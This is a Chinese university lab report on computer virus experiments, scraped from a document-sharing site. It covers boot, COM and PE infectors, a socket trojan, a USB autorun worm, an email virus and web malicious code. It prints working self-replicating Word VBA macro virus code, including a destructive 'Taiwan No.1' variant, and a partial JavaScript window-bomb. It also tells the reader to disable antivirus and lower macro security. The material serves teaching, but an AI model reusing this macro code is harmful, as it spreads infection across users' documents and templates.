计算机病毒及防治实验报告081310128王晨雨Word文档格式.docx

计算机病毒及防治实验报告081310128王晨雨Word文档格式.docx

《计算机病毒及防治实验报告081310128王晨雨Word文档格式.docx》由会员分享，可在线阅读，更多相关《计算机病毒及防治实验报告081310128王晨雨Word文档格式.docx（38页珍藏版）》请在冰豆网上搜索。

2）按任意键后正常引导了DOS系统如图5。

可见，硬盘已被感染。

第四步：

硬盘感染软盘

1）下载empty.img，并且将它插入虚拟机，启动计算机，由于该盘为空，如图6.

2）取出虚拟软盘，从硬盘启动，通过命令formatA:

/q快速格式化软盘。

可能提示出错，这时只要按R键即可。

如图7.

3）成功格式化后的结果如图8。

4）不要取出虚拟软盘，重新启动虚拟机，这时是从empty.img引导，可以看到病毒的画面，如图9。

按任意键进入图10.可见，病毒已经成功由硬盘传染给了软盘。

实验截图：

1.软盘启动后：

2.硬盘启动后：

实验二：

Com病毒实验

1、掌握COM病毒的传播原理。

2、掌握MASM611编译工具的使用。

1、MS-DOS7.10

2、MASM611

1、安装MS-DOS7.10环境。

虚拟机安装该环境亦可，步骤在此不再赘述。

2、在MS-DOSC:

\MASM目录下安装MASM611，然后将binr目录下的link.exe复制到bin目录下。

3、在com目录下复制病毒程序Virus.asm及测试程序源代码BeInfected.asm

4、编译链接BeInfected.asm，形成BeInfectedcom测试程序

5、编译链接virus.asm，生成病毒程序virus.exe。

6、在C:

\MASM\Bin目录下建立del.txt文件，并且将“”和病毒代码2“virus.asm”复制到此目录下。

7、执行“”观察结果。

8、编译并连接“virus.asm”生成“virus.exe”，执行此exe文件以感染“”文件并且自动删除del.txt，而后执行“”可以发现感染后的结果。

1.编译存储好文件：

2.Dos下查看文件夹内容：

3.查看TEST的内容：

4.运行病毒程序：

5.查看感染病毒后文件夹内容：

6.查看感染病毒后TEST的内容：

实验三：

PE文件格式实验

了解PE文件基本结构

【实验环境】

运行环境：

Windows2000、Windows9x、WindowsNT以及WindowsXP

编译环境：

VisualStudio6.0

【实验步骤】

使用编译环境打开源代码工程，编译后可以生成winpe.exe。

预备步骤：

找任意一个Win32下的Exe文件作为查看对象。

实验内容：

运行winpe.exe，并打开任一exe文件，选择不同的菜单，可以查看到exe文件的内部结构。

感染前感染后

第一处：

第二处：

第三处：

第四处：

第五处：

感染前：

感染后：

实验四：

32位文件型病毒实验

●了解文件型病毒的基本制造过程

●了解病毒的感染、破坏机制，进一步认识病毒程序

●掌握文件型病毒的特征和内在机制

运行环境Windows2000、Windows9x、WindowsNT和WindowsXP

目录中的virus.rar包中包括Virus.exe（编译的病毒程序）、软件使用说明书.doc（请仔细阅读）、源代码详解.doc（对代码部分加入了部分注释）以及pll.asm（程序源代码）。

Example.rar包中选取的是一个常用程序（ebookedit）安装后的安装目录下的程序，用于测试病毒程序。

将example.rar解压到某个目录。

解压完毕后，应该在该目录下有Buttons目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe以及keymaker.exe等程序，然后把virus.rar包解压后的Virus.exe复制到该目录中。

通过运行病毒程序观看各步的提示以了解病毒的内在机制。

1.感染前准备：

2.感染过程：

3.感染后：

4.感染文件比对

实验五：

简单的木马实验

掌握木马的基本原理

●WindowsXP操作系统

●VisualStudio6.0编程环境

（1）复制实验文件到实验的计算机上。

其中，SocketListener目录下是木马Server端源代码，SocketCommand目录下是木马Client端源代码。

（2）用VisualStudio6.0环境分别编译这两部分代码。

（3）运行SocketListener应用程序，也就是启动了木马被控端。

（4）运行SocketCommand应用程序，也就是启动了木马的控制端，可以在控制端执行命令来控制被控制端。

实验支持的命令参考表：

命令

命令含义

CMD

执行应用程序

!

SHUT

退出木马

FILEGET

获得远程文件

EDITCONF

编辑配置文件

LIST

列目录

VIEW

查看文件内容

CDOPEN

关CD

CDCLOSE

开CD

REBOOT

重启远端计算机

1.建立连接：

2.发送指令及成功后结果：

（1）运行程序：

（2）关闭木马：

（3）获得文件：

（4）编辑配置文件：

（5）查看文件：

（6）查看文件内容：

（7）重启计算机：

实验七：

木马病毒清除实验（选做）

掌握木马病毒清除的基本原理

●Windows32位操作系统

●VisualStudio7.0编译环境

文件Antitrojan.sln为工程文件。

使用VisualStudio编译该工程，生成Antitrojan.exe可执行程序。

执行Antitrojan.exe观察执行效果。

1.确认木马存在：

2.进行编译：

（1）修改试验机名字：

（2）添加查杀代号：

（3）添加查杀代码：

3.清除成功：

实验八：

Word宏病毒实验

（一）

实验目的

Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

实验所需条件和环境

硬件设备：

局域网，终端PC机。

系统软件：

Windows系列操作系统

支撑软件：

Word2003

软件设置：

关闭杀毒软；

打开Word2003，在工具à

宏à

安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visualbasic项目的访问

实验环境配置如下图所示：

宏病毒传播示意图

实验内容和分析

为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。

例1自我复制，感染word公用模板和当前文档

代码如下：

'

Micro-Virus

SubDocument_Open（）

OnErrorResumeNext

Application.DisplayStatusBar=False

Options.SaveNormalPrompt=False

Ourcode=ThisDocument.VBProject.VBComponents

（1）.CodeModule.Lines（1,100）

SetHost=NormalTemplate.VBProject.VBComponents

（1）.CodeModule

IfThisDocument=NormalTemplateThen

SetHost=ActiveDocument.VBProject.VBComponents

（1）.CodeModule

EndIf

WithHost

If.Lines（1.1）<

>

"

Micro-Virus"

Then

.DeleteLines1,.CountOfLines

.InsertLines1,Ourcode

.ReplaceLine2,"

SubDocument_Close（）"

IfThisDocument=nomaltemplateThen

.ReplaceLine2,"

SubDocument_Open（）"

ActiveDocument.SaveAsActiveDocument.FullName

EndIf

EndWith

MsgBox"

MicroVirusbyContentSecurityLab"

EndSub

打开一个word文档，然后按Alt+F11调用宏编写窗口（工具à

VisualBasicà

宏编辑器）,在左侧的project—>

MicrosoftWord对象à

ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

代码解释

以上代码的基本执行流程如下：

1）进行必要的自我保护

高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。

本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公用模板时自动保存，不给用户提示。

2）得到当前文档的代码对象和公用模板的代码对象

3）检查模板是否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名。

IfThisDocument=nomaltemplateThen

4）执行恶意代码

实验截图

：

1.复制代码

2.感染病毒后现象

3.感染其他文档

实验九：

Word宏病毒实验

（二）

例2具有一定破坏性的宏

我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性（这里以著名宏病毒“台湾一号”的恶意代码部分为基础，为使其在word2003版本中运行，且降低破坏性，对源代码作适当修改）。

完整代码如下：

moonlight

Dimnm（4）

DisableInput1

Setourcodemodule=ThisDocument.VBProject.VBComponents

（1）.CodeModule

Sethost=NormalTemplate.VBProject.VBComponents

（1）.CodeModule

Sethost=ActiveDocument.VBProject.VBComponents

（1）.CodeModule

Withhost

If.Lines（1,1）<

moonlight"

.InsertLines1,ourcodemodule.Lines（1,100）

.ReplaceLine3,"

IfThisDocument=NormalTemplateThen

.ReplaceLine3,"

Count=0

IfDay（Now（））=1Then

try:

OnErrorGoTotry

test=-1

con=1

tog$="

"

i=0

Whiletest=-1

Fori=0To4

nm（i）=Int（Rnd（）*10）

con=con*nm（i）

Ifi=4Then

tog$=tog$+Str$（nm（4））+"

=?

GoTobeg

tog$=tog$+Str$（nm（i））+"

*"

Nexti

beg:

Beep

ans$=InputBox$（"

今天是"

+Date$+"

跟你玩一个心算游戏"

+Chr$（13）+"

若你答错，只好接受震撼教育......"

+Chr$（13）+tog$,"

台湾NO.1MacroVirus"

）

IfRTrim$（LTrim$（ans$））=LTrim$（Str$（con））Then

Documents.Add

Selection.Paragraphs.Alignment=wdAlignParagraphCenter

WithSelection.Font

.Name="

细明体"

.Size=16

.Bold=1

.Underline=1

EndWith

Selection.InsertAfterText:

="

何谓宏病毒"

Selection.InsertParagraphAfter

答案：

Selection.Font.Italic=1

我就是......"

Selection.Font.Italic=0

如何预防宏病毒"

不要看我......"

GoToout

Else

Count=Count+1

Forj=1To20

Nextj

宏病毒"

IfCount=2ThenGoToout

GoTotry

Wend

out:

该病毒的效果如下：

当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕：

何谓宏病毒

我就是......

如何预防宏病毒

不要看我......

如果计算错误，新建20个写有“宏病毒”字样的word文档，然后再一次进行心算游戏，总共进行3次，然后跳出程序。

关闭文档的时候也会执行同样的询问。

清除宏病毒

对每一个受感染的word文档进行如下操作。

打开受感染的word文档，进入宏编辑环境（Alt+F11），打开Normalà

ThisDocument，清除其中的病毒代码（只要删除所有内容即可）。

然后打开Projectà

MicrosoftWordà

ThisDocument，清除其中的病毒代码。

实际上，模板的病毒代码只要在处理最后一个受感染文件时清除即可，然而清除模板病毒后，如果重新打开其他已感染文件，模板将再次被感染，因此为了保证病毒被清除，可以查看每一个受感染文档的模板，如果存在病毒代码，都进行一次清除。

1.复制代码：

2.感染现象：

实验十：

Linux脚本病毒实验（选做）

实验十二：

基于U盘传播的蠕虫病毒实验

理解U盘蠕虫病毒的传染原理。

●VMWareWorkstation5.5.3

●WindowsXPSP2

（1）实验素材：

在附书资源目录Experiment\wormu下

（2）检查干净的电脑各分区是否存在autorun.inf和病毒文件virus.exe

（3）插入含有病毒的U盘，U盘的右键菜单出现auto后，双击U盘，观察现在各个分区的情况

（4）查看autorun.inf文件内容。

（5）观察病毒触发后的效果。

（6）插入干净的U盘，观察U盘是否被感染。

【实验注意事项】

（1）实验前，请关闭杀毒软件。

否则病毒样本会被自动杀除。

（2）请注意操作系统的版本。

WindowsXPSP2及以下版本都适用。

1.编译后生成：

2.运行效果：

实验十三：

邮件型病毒实验

掌握邮件型病毒基本原理

●WindowsXP操作系统

●Outlook邮件客户端

（7）在Outlook中设置用户账号

（8）在Outlook地址簿中添加联系人

（9）在实验的计算机上的C根目录下创建空文件test.vbs

（10）关闭反病毒软件的实时防护功能

（11）把实验代码录入到test.vbs文件里。

（12）运行脚本文件，程序启动Outlook（由于现在的Outlook版本较高，Outlook会提示是否允许操作，请选择允许）发送邮件

（3）要成功实验，系统必须安装OutlookApplication应用软件

（4）为了不给你的地址簿联系人发送垃圾邮件，可以先将地址簿中的联系人导出，然后输入实验用邮件地址。

实验结束后，再重新导入原理地址簿中的联系人。

（5）程序运行后，打开实验邮箱查看实验结果。

一般而言，由于现在的邮件服务器都会对邮件进行扫描，所以传送了病毒的邮件不能传送到邮箱。

解决办法是：

将程序中的一个语句ObjMail.Attachments.Add（“C:

\test.vbs”）删除，或者将附件test.vbs文件内容改为其他内容。

1.将文件存放在C盘，并且修改好文件：

2.运行文件，发送邮件：

3.发送以及收到邮件：

实验十四：

Web恶意代码实验

掌握网页恶意代码基本原理。

WindowsXP操作系统

IE（InternetExplorer）浏览器

【实验步骤】

从光盘上拷贝实验文件到实验机器上（源码位置：

光盘盘符:

\Experiment\IEMalware\1.html）。

用IE打开该文件，IE不断的打开163网页。

如果IE阻止了显示内容，右键点击出现的提示信息，选择“允许阻止的内容”，就可以看到实验现象。

【程序源码】

<

html>

bodyonload="

WindowBomb（）"

SCRIPTLANGUAGE="

javascript"

functionWindowBomb（）

{

while（true）{

window.open（"

h